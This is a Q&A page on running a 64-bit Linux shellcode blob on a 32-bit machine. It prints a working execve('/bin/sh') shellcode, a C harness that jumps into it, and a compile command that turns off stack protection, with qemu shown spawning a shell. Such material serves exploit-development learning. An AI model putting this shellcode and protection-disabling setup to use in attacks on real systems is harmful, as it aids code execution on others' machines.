How to run 64-bit shellcode on 32-bit Linux machine?

Question

I have this shellcode that only runs on 64 bit machine:

unsigned char shellcode[] = \
\xeb\x1f\x48\x31\xc0\x5b\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x43\x10\x6a\x3b\x58\x48\x8d\x3b\x48\x8d\x73\x08\x48\x8d\x53\x10\x0f\x05\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x30\x61\x61\x61\x61\x61\x61\x61\x62\x62\x62\x62\x62\x62\x62\x62

If I run this on 32-bit machine it will of course get seg fault. How do I make it compatible for 64-bit machine?

FYI here is the C code to run the shellcode above (it works perfectly on 64-bit machine):

main()
{


    int (*ret)() = (int(*)())shellcode;

    ret();

}

See https://stackoverflow.com/questions/47144272/shellcode-buffer-overflow-segfault/47195797#47195797 — sinkmanu, Apr 07 '20 at 07:59

score 0 · Answer 1 · answered Apr 11 '20 at 01:07

If you on 32-bit machine, you can use qemu to emulate 64-bit binary :

% qemu-x86_64 ./shell64
warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
$

If you get Segmentation fault, don't forget compile with -fno-stack-protector flag and -m64 flag to create 64-bit binary

% cat shell64.c
#include <stdio.h>

unsigned char shellcode[] = "\xeb\x1f\x48\x31\xc0\x5b\x88\x43\x07\x48\x89\x5b\x08\x48\x89\x43\x10\x6a\x3b\x58\x48\x8d\x3b\x48\x8d\x73\x08\x48\x8d\x53\x10\x0f\x05\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x30\x61\x61\x61\x61\x61\x61\x61\x62\x62\x62\x62\x62\x62\x62\x62";

int main() {
   int (*ret)() = (int(*)())shellcode;
   ret();
}

How to compile :

% gcc-4.6 -o shell64 shell64.c -m64 -fno-stack-protector
% qemu-x86_64 ./shell64
warning: TCG doesn't support requested feature: CPUID.01H:ECX.vmx [bit 5]
$

How to run 64-bit shellcode on 32-bit Linux machine?

1 Answers1